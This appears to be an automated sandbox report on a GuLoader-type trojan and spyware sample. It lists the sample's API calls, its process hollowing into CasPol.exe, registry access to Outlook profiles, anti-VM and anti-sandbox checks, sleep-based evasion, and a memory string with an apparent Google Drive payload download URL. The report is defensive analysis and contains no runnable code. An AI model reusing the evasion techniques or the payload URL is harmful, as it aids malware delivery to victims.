Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640
Detected potential crypto function
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00406D5F 1_2_00406D5F
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_71311BFF 1_2_71311BFF
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D9749 1_2_033D9749
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D7ED6 1_2_033D7ED6
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D0723 1_2_033D0723
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D0376 1_2_033D0376
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3FB4 1_2_033D3FB4
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3FA0 1_2_033D3FA0
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D0388 1_2_033D0388
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D8FFD 1_2_033D8FFD
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D07D2 1_2_033D07D2
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D03C2 1_2_033D03C2
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D061C 1_2_033D061C
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3E0A 1_2_033D3E0A
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D9260 1_2_033D9260
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D4263 1_2_033D4263
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D06AF 1_2_033D06AF
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D4299 1_2_033D4299
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D091B 1_2_033D091B
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D1D44 1_2_033D1D44
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D059F 1_2_033D059F
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3DE4 1_2_033D3DE4
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D043D 1_2_033D043D
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D081D 1_2_033D081D
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D1010 1_2_033D1010
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D0898 1_2_033D0898
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D1C91 1_2_033D1C91
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D04FA 1_2_033D04FA
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D1CE6 1_2_033D1CE6
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D48D3 1_2_033D48D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00AD05D0 3_2_00AD05D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00AD2A90 3_2_00AD2A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00ADD3E0 3_2_00ADD3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00AD37D2 3_2_00AD37D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00ADEFB0 3_2_00ADEFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_1D076B62 3_2_1D076B62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_1D07A160 3_2_1D07A160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_1D079890 3_2_1D079890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_1D079548 3_2_1D079548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_2057C108 3_2_2057C108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_2057EC30 3_2_2057EC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_2057D3D8 3_2_2057D3D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_20571618 3_2_20571618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_209D5860 3_2_209D5860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_209D0BA0 3_2_209D0BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_209D0B91 3_2_209D0B91
Contains functionality to call native functions
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D9749 NtAllocateVirtualMemory, 1_2_033D9749
PE file contains strange resources
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
PE / OLE file has an invalid certificate
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: invalid certificate
Source: FRACCIONAMIENTO 1722403906461L.exe Virustotal: Detection: 27%
Source: FRACCIONAMIENTO 1722403906461L.exe ReversingLabs: Detection: 12%
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe File read: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Jump to behavior
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe "C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe"
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe" Jump to behavior
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe File created: C:\Users\user\AppData\Local\Temp\nsq6822.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/13@3/3
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_004021AA CoCreateInstance, 1_2_004021AA
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_00404AB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:956:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:956:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Finlandsrejserne Jump to behavior
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000003.00000000.15477945295.0000000000BC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.16137261344.00000000033CC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_713130C0 push eax; ret 1_2_713130EE
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033CFF11 push ebx; iretd 1_2_033CFF12
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033CE2B4 push ebp; retf 1_2_033CE315
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033CE2FB push ebp; retf 1_2_033CE315
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00AD84B7 push edi; retn 0000h 3_2_00AD84B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_205708DA push eax; iretd 3_2_205708E1
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_71311BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_71311BFF
Drops PE files
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe File created: C:\Users\user\AppData\Local\Temp\nsr68C1.tmp\System.dll Jump to dropped file
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: CasPol.exe, 00000003.00000002.20370411559.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1P1TRVKFKYHZLCDSRI8V2K0ECN7S0SK7E
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137436673.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20370411559.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137436673.00000000034C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16135483008.000000000070E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16135483008.000000000070E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3432 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4904 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033CCB37 rdtsc 1_2_033CCB37
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9376 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405D74
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_0040699E FindFirstFileW,FindClose, 1_2_0040699E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe System information queried: ModuleInformation Jump to behavior
